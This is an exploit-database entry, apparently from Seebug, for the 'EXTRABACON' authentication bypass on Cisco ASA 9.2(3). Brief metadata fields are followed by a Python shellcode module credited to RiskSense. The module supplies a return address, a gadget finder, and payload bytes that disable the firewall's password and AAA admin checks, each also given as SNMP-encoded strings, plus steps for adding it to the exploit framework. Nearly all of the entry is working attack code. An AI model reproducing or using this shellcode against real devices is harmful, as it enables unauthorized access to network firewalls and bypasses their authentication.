Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass

Basic Fields

SSV ID:: SSV-92430

Find Time:: Unknown

Submit Time:: 2016-09-20

Level:

Category:: 越权访问

Component:: Cisco ASA
(=9.2(3))

Author:: Unknown

Submitter:: anonymous

CVE-ID：: Add

CNNVD-ID：: Add

CNVD-ID：: Add

ZoomEye Dork：: Add

Source

Detail

Unavailable Detail

PoC (非 pocsuite 插件)

Contributor anonymous totally have 0KB

# Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module) # # Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com) # License: http://opensource.org/licenses/MIT # Release Date: September 15, 2016 # # Authors: # Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B) # Zachary Harding (14C0AA3670E9501ADDFC0176298CD7A969BAA8A1) # # Description: # Additional EXTRABACON module for Cisco ASA version 9.2(3). # This does not use the same shellcode as the Equation Group version, # but accomplishes the same task of disabling the auth functions # in less stages/bytes. # # Build/Run: # 1) Save this file to versions/shellcode_asa923.py # 2) Add the version string to fw_version_check() # 3) Shellcode is for --pass-disable # vers = "asa923" # there is a jmp esp @ 08 1d 70 1d # 81d701c: e8 ff e4 ff ff call 81d5520 <_ctm_hw_free@@Base+0x50fd0> my_ret_addr_len = 4 my_ret_addr_byte = "\x1d\x70\x1d\x08" my_ret_addr_snmp = "29.112.29.8" finder_len = 9 finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" finder_snmp = "139.124.36.20.139.7.255.224.144" # ROPgadget --binary lina_92-3 --opcode 897dfc8b1685d2 # 0x9b78010 = function # 0x9b78000 = byte boundary # 0x8085a40 # 0x8085000 # preamble has a stack clean up and offset to where we first hijacked execution # 0x9277386 preamble_len = 69 preamble_byte = "\x31\xc0\x31\xdb\x31\xf6\x31\xc9\x60\x80\xc5\x10\x80\xc2\x07\x04\x7d\x50\xbb\x00\x80\xb7\x09\xcd\x80\x58\xbb\x00\x50\x08\x08\xcd\x80\x68\x31\xc0\x40\xc3\x58\xa3\x10\x80\xb7\x09\xa3\x40\x5a\x08\x08\x61\x68\x86\x73\x27\x09\x80\xc3\x10\xbf\x0b\x0f\x0f\x0f\x89\xe5\x83\xc5\x48\xc3" preamble_snmp = "49.192.49.219.49.246.49.201.96.128.197.16.128.194.7.4.125.80.187.0.128.183.9.205.128.88.187.0.80.8.8.205.128.104.49.192.64.195.88.163.16.128.183.9.163.64.90.8.8.97.104.134.115.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195" postscript_len = 2 postscript_byte = "\x61\xc3" postscript_snmp = "97.195" launcher_len = 6 launcher_snmp = "144.144.144.144.144.144" launcher_byte = "\x90\x90\x90\x90\x90\x90" payload_nop_len = 116 payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195" payload_PMCHECK_DISABLE_len = 70 payload_PMCHECK_DISABLE_byte = "\x7a\x30\x78\x30\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\x12\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\x80\xb7\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" payload_PMCHECK_DISABLE_snmp = "122.48.120.48.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.18.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.128.183.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" payload_AAAADMINAUTH_DISABLE_len = 66 payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\x5a\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.90.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"